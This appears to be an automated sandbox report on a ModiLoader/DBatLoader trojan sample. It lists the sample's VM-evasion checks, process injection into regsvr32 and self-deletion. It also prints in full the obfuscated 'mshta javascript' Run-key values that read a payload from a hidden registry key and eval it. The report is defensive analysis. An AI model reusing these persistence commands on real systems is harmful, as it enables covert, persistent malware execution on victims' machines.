Malware Analysis Report

2024-08-06 14:39

Sample ID 240524-l9b4psdd5v
Target ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe
SHA256 ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b

Threat Level: Known bad

The file ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

ModiLoader, DBatLoader

Checks for common network interception software

ModiLoader Second Stage

Looks for VirtualBox Guest Additions in registry

Looks for VMWare Tools registry key

Adds policy Run key to start application

Checks BIOS information in registry

Deletes itself

Adds Run key to start application

Maps connected drives based on registry

Unsigned PE

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-24 10:13

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-24 10:13

Reported

2024-05-24 10:16

Platform

win7-20240221-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:g1hNNGwv=\"qT\";nj84=new%20ActiveXObject(\"WScript.Shell\");FuGVSCf2=\"0Zq4\";S1RKg1=nj84.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\369ddf2b1c\\\\7856548a\");MjPJIK28n=\"L\";eval(S1RKg1);jGEVFv3=\"UL\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:ub12jJXJ=\"qWbpz\";Dx92=new%20ActiveXObject(\"WScript.Shell\");KtUA2vO3=\"y82PzI\";lO5fV=Dx92.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\369ddf2b1c\\\\7856548a\");e5XsIUxA=\"luZ8Ae\";eval(lO5fV);fnHVEp1=\"b0\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:qeKwJcM8=\"XMya\";AL6=new%20ActiveXObject(\"WScript.Shell\");njUsE0T=\"RQKJS0\";y0zlJ=AL6.RegRead(\"HKCU\\\\software\\\\369ddf2b1c\\\\7856548a\");WP3YHAiqR=\"PYHl\";eval(y0zlJ);LGGy69Ps=\"oU\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2512 wrote to memory of 2328 N/A C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2328 wrote to memory of 2584 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2584 wrote to memory of 2692 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2584 wrote to memory of 3020 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe

"C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Files

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-24 10:13

Reported

2024-05-24 10:16

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:BiVgFv8sk=\"oF4CRdm8\";oI6=new%20ActiveXObject(\"WScript.Shell\");AIxo2IK8pk=\"brM\";eHH55S=oI6.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\0ce5cf04e2\\\\48becf64\");s0lqFUdW2=\"eYI\";eval(eHH55S);owtGfR7=\"rDh6uhgD8Z\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:V4ZIjljEA1=\"md3\";D44W=new%20ActiveXObject(\"WScript.Shell\");H1yU2XkXi=\"3S9T0\";uB1PD=D44W.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\0ce5cf04e2\\\\48becf64\");e09rwvBWic=\"qFxsl1\";eval(uB1PD);ofl8fDD=\"URhHanW\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:okUzNX0f6=\"8j7\";I5W9=new%20ActiveXObject(\"WScript.Shell\");GzDK6AEs=\"xGTFvsSy\";V06jEB=I5W9.RegRead(\"HKCU\\\\software\\\\0ce5cf04e2\\\\48becf64\");LDBmqWv4=\"PF\";eval(V06jEB);e8q6UBiAs=\"rrI2eLKX\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4144 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4244 wrote to memory of 4456 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4456 wrote to memory of 1680 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4456 wrote to memory of 4760 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe

"C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3416,i,13879737908471496610,15335851594401413307,262144 --variations-seed-version --mojo-platform-channel-handle=4312 /prefetch:8

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto

Files
